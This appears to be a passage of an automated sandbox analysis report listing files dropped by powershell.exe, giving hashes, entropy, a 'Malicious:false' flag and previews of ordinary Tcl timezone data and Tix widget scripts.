                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3284
                                                                                                                                                                                                                      Entropy (8bit):3.8546064195941097
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:5pKSxZwR9IVQU55DG5krgGN8wW+YeD1yyfCwoc:HKSjgIVzrG5krRN8wWheD1yu
                                                                                                                                                                                                                      MD5:4DA622B685B3B075CC94FC4E23322547
                                                                                                                                                                                                                      SHA1:DEB23F0A434549DAE1BE60ACF757BB212C907B92
                                                                                                                                                                                                                      SHA-256:E07F45264E28FD5AA54BD48CB701658509829CF989EC9BD79498D070A1BA270F
                                                                                                                                                                                                                      SHA-512:9B00BF8870BC4AAEF7F06FCDFEEEF54686A2CC890103696631EB4DEF5AEEAD051EC9069D70A2B22397F18C0067E03A54E75DA18474D6B1BD3BDA2D5313E0AD16
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belize) {.. {-9223372036854775808 -21168 0 LMT}.. {-1822500432 -21600 0 CST}.. {-1616954400 -19800 1 -0530}.. {-1606069800 -21600 0 CST}.. {-1585504800 -19800 1 -0530}.. {-1574015400 -21600 0 CST}.. {-1554055200 -19800 1 -0530}.. {-1542565800 -21600 0 CST}.. {-1522605600 -19800 1 -0530}.. {-1511116200 -21600 0 CST}.. {-1490551200 -19800 1 -0530}.. {-1479666600 -21600 0 CST}.. {-1459101600 -19800 1 -0530}.. {-1448217000 -21600 0 CST}.. {-1427652000 -19800 1 -0530}.. {-1416162600 -21600 0 CST}.. {-1396202400 -19800 1 -0530}.. {-1384713000 -21600 0 CST}.. {-1364752800 -19800 1 -0530}.. {-1353263400 -21600 0 CST}.. {-1333303200 -19800 1 -0530}.. {-1321813800 -21600 0 CST}.. {-1301248800 -19800 1 -0530}.. {-1290364200 -21600 0 CST}.. {-1269799200 -19800 1 -0530}.. {-1258914600 -21600 0 CST}.. {-1238349600 -19800 1 -0530}.. {-1226860200 -21600
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):206
                                                                                                                                                                                                                      Entropy (8bit):4.938043196147077
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290F490ppv:MByMYbpwt290S90b
                                                                                                                                                                                                                      MD5:09FD8280CC890F238126F9641DB7C90E
                                                                                                                                                                                                                      SHA1:98AB4E0DE8173C2BB2532B07FAE2E71F588AB26F
                                                                                                                                                                                                                      SHA-256:FACD0A835D1F425CD323EE453ADE231810B2D1CF6EBA227BA1B50522AE3879F7
                                                                                                                                                                                                                      SHA-512:117C24389B7BFB079F4409B1FA6AA547654D7C69A6CBB19218BF2B96F6CFE3CBAAD400D4C2EFE8A9BFE25F44402057427FC8A62DC20A98018D23A7CF9B87401F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Blanc-Sablon) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1199
                                                                                                                                                                                                                      Entropy (8bit):3.7988385604912893
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:5EThevwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQZ:5EHSeSFESoSQSrSsCSeSPS1cSQSQlSsp
                                                                                                                                                                                                                      MD5:9529221F9B4E104CC598491703B10E6C
                                                                                                                                                                                                                      SHA1:5ACD61B525A18DE1919A7484C92EC5D787DF2F25
                                                                                                                                                                                                                      SHA-256:10592EA1CB0D02C06A61059EC601F70A706A5053AC923B9EED29388D5E71EF3A
                                                                                                                                                                                                                      SHA-512:66BEDB631469651A5E426155428764E3C1C14483E6FEE1505812E8676EB6E82CF0A88F6CC697F03FDA0AF906D91C7DE6E940DF3D33DD247BEF51DBD9A13DEE16
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boa_Vista) {.. {-9223372036854775808 -14560 0 LMT}.. {-1767211040 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):246
                                                                                                                                                                                                                      Entropy (8bit):4.705337479465446
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/290bJhDm2OHDgoHvcuknov/zEXPKV2kR/uFVEV/KVg:MB86290bLmdHDgCvcukCz8O2Y/uF2/Og
                                                                                                                                                                                                                      MD5:DB019451A7D678C3E7AEE706283861F6
                                                                                                                                                                                                                      SHA1:57E63C5372F50CBD1A7FA32688C1B77ADDCC06EB
                                                                                                                                                                                                                      SHA-256:B6ADC16815DC95E537548CA3572D7F93626A6D1DC390DD4CBABAB5AB855BBA30
                                                                                                                                                                                                                      SHA-512:6C94B2D7EFA856E6BD41FC45B0E8D16A40E61D8B895397CD71230047FAD4793DDB9ABAAC57D2841549F161C9389D7E61D54D38F1BAC6F13ED3DD4C68CDD3272C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bogota) {.. {-9223372036854775808 -17776 0 LMT}.. {-2707671824 -17776 0 BMT}.. {-1739041424 -18000 0 -05}.. {704869200 -14400 1 -05}.. {733896000 -18000 0 -05}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8605
                                                                                                                                                                                                                      Entropy (8bit):3.8563913604109064
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:eSwtktXNmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/jXNDPlLv/PCenJzS6cy
                                                                                                                                                                                                                      MD5:005D0BF1320030A7E9CDC97D0C8BB44B
                                                                                                                                                                                                                      SHA1:CB236DA840A49B4BCD261114DCA38DADA567B091
                                                                                                                                                                                                                      SHA-256:93AF910CB2AD2203B71C1AD49D56DF4A4A14D07F885AFD4E755271F1372A517C
                                                                                                                                                                                                                      SHA-512:16A5483392741673BEC020EF6EBE963AB0FB12629D662C586C27A1E9A1BE3FEA8DC3D05A0E84917B8166E48CADA45C74DFABFDC897A6BC94D3C5058D31AD5126
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boise) {.. {-9223372036854775808 -27889 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-1471788000 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126255600 -25200 0 MST}.. {129114000 -21600 0 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):239
                                                                                                                                                                                                                      Entropy (8bit):4.821972751564724
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9vsM3y7/MQA+zAHAIgp/MQA+zE5N/290BFzk5h490/MQA+zd:MByMY/MV+zhp/MV+zE5t290rzy490/MW
                                                                                                                                                                                                                      MD5:6700956D5FE96CEC8D34EB49FF805374
                                                                                                                                                                                                                      SHA1:69B9973EF31AE204EFED7485E59CEA99E00815C8
                                                                                                                                                                                                                      SHA-256:DEFC5C9DA2D4D4146145A50D692A6BFF698C3B0A1F19EFD82AD0EE7678F39FCF
                                                                                                                                                                                                                      SHA-512:A80C03A519F00A4270248E885463090A34B3992B3DEBA94DD6AEBCC50736541655461E4AA10856125B8EF9B92CEB697429EE7088DBC6AB4FAE383FDF11521B7A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Buenos_Aires)]} {.. LoadTimeZoneFile America/Argentina/Buenos_Aires..}..set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7739
                                                                                                                                                                                                                      Entropy (8bit):3.8713679494465016
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:zsGaLV9T1sF7Lv/PCewtA8CzSPyDLbrcUia:h5lLv/PCenJzS6cy
                                                                                                                                                                                                                      MD5:E6AE12CDB55FED492C253E46E2690FE0
                                                                                                                                                                                                                      SHA1:CD3699E50BC1694827E51E4101C713E52FA646C8
                                                                                                                                                                                                                      SHA-256:3E0506A54B562DBC3AA6889DDD39B327FE0B85C63B00F0B39D606921A0936A59
                                                                                                                                                                                                                      SHA-512:BA3D5D5420210E74E74A581C9678224948266828A8FACE06383E41E13475C682F82D288426FB915D618FFE7ED95BD8F1C7E9D59D31CE5B464D5EC1363AB5E340
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cambridge_Bay) {.. {-9223372036854775808 0 0 -00}.. {-1577923200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2918
                                                                                                                                                                                                                      Entropy (8bit):3.6039149423727013
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:591PSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxSs:5VsE3LMuJALTvn1ZdP7ZbvLfeAh+KIic
                                                                                                                                                                                                                      MD5:230A9F7A87BA56C30ACB3B1732F823F3
                                                                                                                                                                                                                      SHA1:8263EA723F2AEA7740C7EC54BE0000A06982D765
                                                                                                                                                                                                                      SHA-256:6D5BD1355016B03EDEA58DF98BEC26281CD372725B2DCB60B4D748D2FB4346C8
                                                                                                                                                                                                                      SHA-512:C357AA33833DBBDC6BC7DD3F23469EADDF08564AF17D7EE935C8AEA5F35B6E3BBDE1E181BC0DBF264051C4BE139261055633D191413DD610B0150AB3CDE161AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Campo_Grande) {.. {-9223372036854775808 -13108 0 LMT}.. {-1767212492 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1412
                                                                                                                                                                                                                      Entropy (8bit):4.034087321254386
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:5s5edTS/uVV3iVP/uaP/uAyAhbS+V8S+FfS+UvS+MS+FB3S+QS+rcS+kS+RS+dSB:5DziZAmELf0On9uhcinzPPoUlWQW3
                                                                                                                                                                                                                      MD5:7FBCA91F4B7100C4667F24A9AB263109
                                                                                                                                                                                                                      SHA1:163A77FF9EAC49B00B5F838DF4D47F079ECF6A83
                                                                                                                                                                                                                      SHA-256:FD6C370F82E5CFE374637E0E222E72570857AC3F85143BEEEF9C3D0E7A6C0D04
                                                                                                                                                                                                                      SHA-512:124A5D7F58B38F15A90BA48E63D1D38335371D98A2503E691EC6426EB51E87FD61CA05FCA83573DD1DC06DB9E599302C64D226D5DF13B8A62E0A6943318431BE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cancun) {.. {-9223372036854775808 -20824 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {828860400 -14400 1 EDT}.. {846396000 -18000 0 EST}.. {860310000 -14400 1 EDT}.. {877845600 -18000 0 EST}.. {891759600 -14400 1 EDT}.. {902041200 -18000 0 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):284
                                                                                                                                                                                                                      Entropy (8bit):4.588048586971241
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9eg/2909+ETlDm2OHXoHv8HkISlvFVFQVgVJUF/R/OXFxWnVVFQVgVVvR/e:MB86290XmdHXCvydSltvAUeFZ/O/qVva
                                                                                                                                                                                                                      MD5:5DDB49759D58931A06740A14F76B431C
                                                                                                                                                                                                                      SHA1:E9AC99265D42D140E12BB4DAAA24FABAC65E79FA
                                                                                                                                                                                                                      SHA-256:D558C25F165E956E980AA8F554AB3BF24E91B51EADBD2B1065EF6DFDA0E2F984
                                                                                                                                                                                                                      SHA-512:318804ED41F36A3A8746C8CD286116787A768B06CAD6057559D1C7105170DE6EAB807EFA52AA8A0E353491B6F8C47D623D4473C1AEAD20B5C00747E07BB282B2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Caracas) {.. {-9223372036854775808 -16064 0 LMT}.. {-2524505536 -16060 0 CMT}.. {-1826739140 -16200 0 -0430}.. {-157750200 -14400 0 -04}.. {1197183600 -16200 0 -0430}.. {1462086000 -14400 0 -04}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):227
                                                                                                                                                                                                                      Entropy (8bit):4.666638841481612
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/29094SXAFB5290/MMXAy:MByMY/MYp/MrRt290mh5290/MK
                                                                                                                                                                                                                      MD5:EEB851BE330BCC44A4831763534058B9
                                                                                                                                                                                                                      SHA1:A5FC3E69DDBD3C40D9EB4317BBD5BB6C78751B36
                                                                                                                                                                                                                      SHA-256:37CD6BDAA6C6EEDFAC3288CA1C11F5CBBE8A17E5F2E790E7635A64B867AFBD87
                                                                                                                                                                                                                      SHA-512:7CD0BC822550325EB3198B4AD6CCD38938FA654A03A09C53117560D1FE3FDCD9C892D105F0D7AF44ED52DD7E0475721240D74A10C98619BE9EC4F5410B8FD87D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):185
                                                                                                                                                                                                                      Entropy (8bit):4.832612867310476
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGE91INMXGm2OHEFvpoeoHsdR4FIUPvGXFkUwXvp3VVV:SlSWB9eg/2909qDm2OHEdGeoHm4vOXF6
                                                                                                                                                                                                                      MD5:6052E52C8E5A5F43102C47D895797A1F
                                                                                                                                                                                                                      SHA1:23DBD40AE96C84E44ADCD1AC33E7871D217C17BC
                                                                                                                                                                                                                      SHA-256:873285F3E13CB68DD28EB109ECAD8D260E11A9FF6DF6A4E8E0D4C00B0182695B
                                                                                                                                                                                                                      SHA-512:DDE89C70B6F24AD4F585DC5424A6D029E5C898254C9085C588AE699CED4C8316840FF7C87685D7CFAA2E689F01687985454A0C9E3886342E936C56AB688DF732
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cayenne) {.. {-9223372036854775808 -12560 0 LMT}.. {-1846269040 -14400 0 -04}.. {-71092800 -10800 0 -03}..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4471
                                                                                                                                                                                                                      Entropy (8bit):4.899301562356376
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:F77Mjha4/v6+//PZ5NEpRU9u5h3RRwctP+pnKpUOlmEfCR6:ZIjhJ6YnlEp5zjtP+pKpUOcEM6
                                                                                                                                                                                                                      MD5:9BF9CEECBA00416BD70618E52CFF0D04
                                                                                                                                                                                                                      SHA1:B567A455FB77790C34F37C6F62B7637F0E182233
                                                                                                                                                                                                                      SHA-256:0101A4A368908409E8D2EE3CBF4DAD1691B28AE68354676002962E4BA6DE31FA
                                                                                                                                                                                                                      SHA-512:2C6B9C46200D9448B7F6783350188F804AE4042A629DBF90D34DC47084CE1FA2E9997C2C9F6CCE02C2C5567021CB238820C676516D94D65A5616ACE1A9CD1C8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DialogS.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# DialogS.tcl --..#..#..#.Implements the DialogShell widget. It tells the window..#.manager that it is a dialog window and should be treated specially...#.The exact treatment depends on the treatment of the window..#.manager..#..# Copyright (c) 1994-1996, Expert Interface Technologies..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDialogShell {.. -superclass tixShell.. -classname TixDialogShell.. -method {...popdown popup center.. }.. -flag {...-mapped -minheight -minwidth -parent -transient.. }.. -static {}.. -configspec {...{-mapped mapped Mapped 0}...{-minwidth minWidth MinWidth 0}...{-minheight minHeight MinHeight 0}...{-transient transient Transient true}...{-parent parent Parent ""}.. }..}....#------
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5632
                                                                                                                                                                                                                      Entropy (8bit):5.045347718114719
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FbOMCAcE8hLR8FPMiujrFgDrfCP8wMi9UOMjmndqupF58+TT:EMsE8hLRyPbCBuD6yVjmd/pFi+TT
                                                                                                                                                                                                                      MD5:68A2C22FCAE9CA8B376C80B4EAED6B75
                                                                                                                                                                                                                      SHA1:105619675BDB8961FAB455BC98679C96B50280DC
                                                                                                                                                                                                                      SHA-256:CE99218B3AC5EAFF04883F0AB4E7F6AEC39C9C7F13B2A9ADA78B8B6B257FA702
                                                                                                                                                                                                                      SHA-512:D2C9A8ED0C326A4900E1A64FE7AFC04E5329AE6EBEF09F549B6324301FB47DA038DA7A2DDAC0DD3FA5772CE79FDCD4FA3987CB858E4A3E6FA2E44EB609E9E152
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirBox.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# DirBox.tcl --..#..#.Implements the tixDirSelectBox widget...#..# . - overrides the -browsecmd and -command options of the..#. HList subwidget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDirSelectBox {.. -classname TixDirSelectBox.. -superclass tixPrimitive.. -method {.. }.. -flag {...-command -disablecallback -value.. }.. -configspec {...{-command command Command ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoolean}...{-label label Label "Directory:"}...{-value value Value ""}.. }.. -forcecall {...-value -label.. }.. -default {...{*combo*listbox.heigh
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2301
                                                                                                                                                                                                                      Entropy (8bit):5.149652720889196
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLbJFuKvk2MXuFPZFxdlpz7Plg3ebgcbLDa6n3rnojxpCFcerf:Fbbu+bjFb/zTSI5ZFceD
                                                                                                                                                                                                                      MD5:34805C238172C91272A23A181BE1ECDD
                                                                                                                                                                                                                      SHA1:06FE662FECFA41D11F59D939A57A3512F2AA247C
                                                                                                                                                                                                                      SHA-256:22185FF1362E6A9BE6F363D096503BBD4DC120BA6C64E562C6C15EC5699754E9
                                                                                                                                                                                                                      SHA-512:AC013383CA597B97AA527911ABE8E82FF28C313AA30C5FE546A5FB381ACAC155EE73D8C55BEA5033F9DD63C678F3D91EB4D76D54A945C8ADEAE3876C8A2172C6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirDlg.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# DirDlg.tcl --..#..#.Implements the Directory Selection Dialog widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDirSelectDialog {.. -classname TixDirSelectDialog.. -superclass tixDialogShell.. -method {}.. -flag {...-command.. }.. -configspec {...{-command command Command ""}...{-title title Title "Select A Directory"}.. }.... -default {...{*ok.text.."OK"}...{*ok.underline..0}...{*ok.width..6}...{*cancel.text.."Cancel"}...{*cancel.underline.0}...{*cancel.width..6}...{*dirbox.borderWidth.1}...{*dirbox.relief..raised}.. }..}....proc tixDirSelectDialog:ConstructWidget {w} {.. upvar #0 $w data.... tixChainM
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7336
                                                                                                                                                                                                                      Entropy (8bit):4.994789769382544
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:B1G/rGc9KHNdYo20F5SJk/o5d5/ARvBqysJh:B1GD9KtdYp0FAJrLVARvg/
                                                                                                                                                                                                                      MD5:6E8AFCAAFF32CBB682546AAE1FFC1453
                                                                                                                                                                                                                      SHA1:7C291F5BE9390857A435431E8B4ADF99BDFDE98B
                                                                                                                                                                                                                      SHA-256:8447068C3DFFF842005C7D40103B90FA7707D3B1818F6F0CC7385DAFD9F54EC5
                                                                                                                                                                                                                      SHA-512:C3ED2CC763216D93F7E4A0C510CAFB5BEC4E47B42A52D43086ECA07D7007FFD6302DA35C050C98BB7478C70C46FC7822F3285E77C4670E5E1FD7311020702E3F
                                                                                                                                                                                                                      Malicious:false
